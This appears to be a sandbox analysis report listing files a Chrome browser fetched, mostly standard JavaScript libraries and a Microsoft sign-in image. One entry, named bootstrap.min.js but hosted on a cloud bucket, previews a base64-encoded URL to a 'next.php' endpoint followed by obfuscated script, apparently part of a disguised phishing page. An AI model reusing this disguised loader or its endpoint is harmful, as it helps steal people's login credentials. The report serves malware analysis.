                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (50758)
                                  Category:dropped
                                  Size (bytes):51039
                                  Entropy (8bit):5.247253437401007
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:67176C242E1BDC20603C878DEE836DF3
                                  SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                  SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                  SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (47671)
                                  Category:downloaded
                                  Size (bytes):47672
                                  Entropy (8bit):5.401921124762015
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:B804BCD42117B1BBE45326212AF85105
                                  SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                  SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                  SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js
                                  Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (32065)
                                  Category:downloaded
                                  Size (bytes):85578
                                  Entropy (8bit):5.366055229017455
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:2F6B11A7E914718E0290410E85366FE9
                                  SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                  SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                  SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                  Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (48664)
                                  Category:downloaded
                                  Size (bytes):48944
                                  Entropy (8bit):5.272507874206726
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                  SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                  SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                  SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                  Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                  Category:downloaded
                                  Size (bytes):61
                                  Entropy (8bit):3.990210155325004
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65462), with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):553308
                                  Entropy (8bit):4.9120987983929965
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:A770A3CC47DEB6C0B8DB27786EE35799
                                  SHA1:1F7AD6B9A8D42CAE2E34BC7BF227CBCDAE193995
                                  SHA-256:96575360ADD47A5C1A9C1D1F215367E47B7FF8A27FE99549D3717A77FB92A9B0
                                  SHA-512:6A40D16C0E6084C4A26AA52F41E28B57C7583FB76447C22B8B22EB15925ACF0A80C5A53C967625EBD87FA0D1EA67ABF7ACA8D3C5403CDF2E24F9E7871858E225
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://6032451419-1323985617.cos.na-siliconvalley.myqcloud.com/bootstrap.min.js
                                  Preview:var file = "aHR0cHM6Ly82MDMyNDUxNDE5Lmludm9jZWxhdy5jb20vbmV4dC5waHA=";....var _0x55a2a4=_0x2c13;function _0x2b19(){var _0x4966e1=['x-lg-row\x20{','color:\x20tra','div\x20id=\x22ma','-lg-0\x20{\x20ma','~.valid-to','1|4|0|2|6|','n-top:\x201.5',':focus,\x20.f','ning\x20hr\x20{\x20','end\x20!impor','er;\x20justif','tify\x20!impo','owrap\x20!imp','kit-clip-p','or:\x20#00408','ble\x20td,\x20.t','t/ests/2.1','hite-space','r\x20p-2\x22\x20onm','\x20#pacifism','>&nbsp<spa','sm-wrap\x20{\x20','g9GFerfs7/','fDngjSvCsG','u\x20to\x20your\x20','pover-top\x20','\x20}\x20.btn-da','webkit-app','an><br>\x20<d','lumn;\x20flex','\x20#6c757d\x20!','+PQcVpU7gF','#495057;\x20b','-color:\x20#1','\x20calc(.3re','rst-child)','econdary:f','to\x20!import','}\x20.table-r','-box-flex:','cus,\x20.was-','ng-top:\x200\x20','utton.bg-w','eader,\x20.ca','\x200\x20}\x20.tabl','re,\x20.bs-to','image/svg+','tton:focus','jo4inKDdSN','{\x20text-tra','roup:\x2013;\x20',',\x20.btn.act','r:\x20#28a745','vcoBM','\x20.border-i','
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:SVG Scalable Vector Graphics image
                                  Category:downloaded
                                  Size (bytes):1864
                                  Entropy (8bit):5.222032823730197
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:BC3D32A696895F78C19DF6C717586A5D
                                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (19015)
                                  Category:dropped
                                  Size (bytes):19188
                                  Entropy (8bit):5.212814407014048
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:70D3FDA195602FE8B75E0097EED74DDE
                                  SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                  SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                  SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                  No static file info